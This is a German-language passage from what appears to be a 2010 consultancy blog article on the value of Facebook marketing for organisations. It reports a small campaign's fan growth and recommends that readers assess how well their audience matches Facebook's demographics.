Doch was nützen hohe Nutzerzahlen? Bringen Investitionen in Facebook-Kampagnen einen praktischen Nutzen?
Diese Fragen beschäftigen auch uns seit einiger Zeit. Deshalb haben wir begonnen, Facebook intensiver zu studieren und im Rahmen von ersten Projekten Erfahrungen zu sammeln. Keine leichte Aufgabe, denn ausführliche Dokumentationen sind bei Facebook praktisch nicht verfügbar – „Learning by doing“ ist oft der einzige Lösungsweg.
Gemeinsam mit unseren Partnern runME.de und Verpflegungsstelle.com haben wir im Dezember erste Facebook-Kampagnen ins Leben gerufen. Das Resultat ist beachtlich: Mit Werbeausgaben von gut 500 EUR sowie wöchentlich zwei kurzen redaktionellen Beiträgen, konnten in nur drei Monaten Facebook-Seiten mit über 6.700 Fans („Fans“ ist die offizielle Facebook-Terminologie, man könnte auch den Begriffe Abonnenten verwenden.) aufgebaut werden. Zum Zeitpunkt der Veröffentlichung dieses Artikels liegt das tägliche Wachstum ohne Werbung bei rund 100 neuen Fans. Facebook stellt bereits nach wenigen Monaten eine wichtige Besucherquelle von runME.de dar.

Basierend auf diesem Erfolg und der günstigen Wettbewerbssituation konzipieren beide Partnerunternehmen derzeit eine Intensivierung der Facebook-Aktivitäten. Sobald erste Ergebnisse vorliegen (voraussichtlich April 2010), werden wir hiervon berichten.

Abschließend nochmals zurück zur Eingangsfrage: Ist Facebook für Ihre Organisationen wichtig?

Wenn Ihre Zielgruppe (weitgehend) mit den demographischen Kennzahlen von Facebook übereinstimmt, empfehlen wir Ihnen, das Thema so schnell wie möglich auf die Tagesordnung zu setzen. Analysieren Sie die Zielgruppenübereinstimmung und prüfen Sie mögliche Aktivitäten.
Berücksichtigen Sie dabei unbedingt die Besonderheiten des Sozialen Netzwerks Facebook. Der gelegentliche Dialog mit den „Fans“ und die virale („Mund-zu-Mund“) Verbreitung von Inhalten sind integraler Bestandteil der Plattform. Geschickt eingesetzt, bietet Facebook Organisationen eine sehr attraktive Möglichkeit, um zahlreiche neue Kontakte aufzubauen und bestehende zu stärken.

Sollte Ihre Zielgruppe derzeit nicht auf Facebook vertreten sein, empfehlen wir Ihnen, zumindest eine intensive Beobachtung der Thematik. Das rasante Wachstum kann die Situation in nur wenigen Monaten verändern.

In den kommenden Wochen werden wir Ihnen mit weiteren Artikeln auf unserer Website die ersten Schritte auf Facebook erleichtern. Gerne stehen wir Ihnen auch für eine persönliche Beratung zur Verfügung.